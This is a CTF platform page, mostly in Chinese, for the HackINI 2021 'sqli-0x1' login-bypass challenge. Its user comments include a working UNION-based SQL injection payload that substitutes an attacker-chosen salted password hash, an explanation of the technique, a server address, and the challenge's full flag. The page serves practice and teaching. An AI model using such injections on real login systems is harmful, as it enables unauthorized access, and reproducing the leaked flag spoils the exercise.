sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2156
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

...
登录回复
评论
Zpfhh 15天前
举报

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 0
cfggfbfxdgbb 23天前
举报

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0
hengdonghui 1月前
举报

格式是: shellmates{********} 不是flag{******}格式。

回复 0
白乐 1月前
举报

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 1月前
举报

/?pls_help,审计代码

回复 0
Alune 1月前
举报

加盐密码哈希

回复 0
15031597817 4月前
举报

这个登上以后不出flag咋办

回复 1
a543589796 4月前
举报

这道题为什么sqlmap跑不出来啊?

回复 0
lunarbyside 7月前
举报

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4
Systems 11月前
举报

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 3
33555 1年前
举报

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

WriteUp

image
a2cai

2 金币

立即查看

评分(27)

解题动态

aseliliy 攻破了该题 3小时前
哈喽哈 攻破了该题 3小时前
13309005041 攻破了该题 6小时前
liberator 攻破了该题 1天前
yiya咿呀 攻破了该题 2天前
socks 攻破了该题 2天前
7F57 攻破了该题 2天前
zjr 攻破了该题 3天前
LazyYi 攻破了该题 4天前
zdabajfk 攻破了该题 4天前
lye 攻破了该题 4天前
pfgamer 攻破了该题 4天前
him0x12 攻破了该题 5天前
another2001 攻破了该题 7天前
Qzmlgfj 攻破了该题 7天前
zhao8456852 攻破了该题 8天前
wediz 攻破了该题 8天前
oiiaio 攻破了该题 8天前
vperic 攻破了该题 9天前
10035 攻破了该题 9天前
问题反馈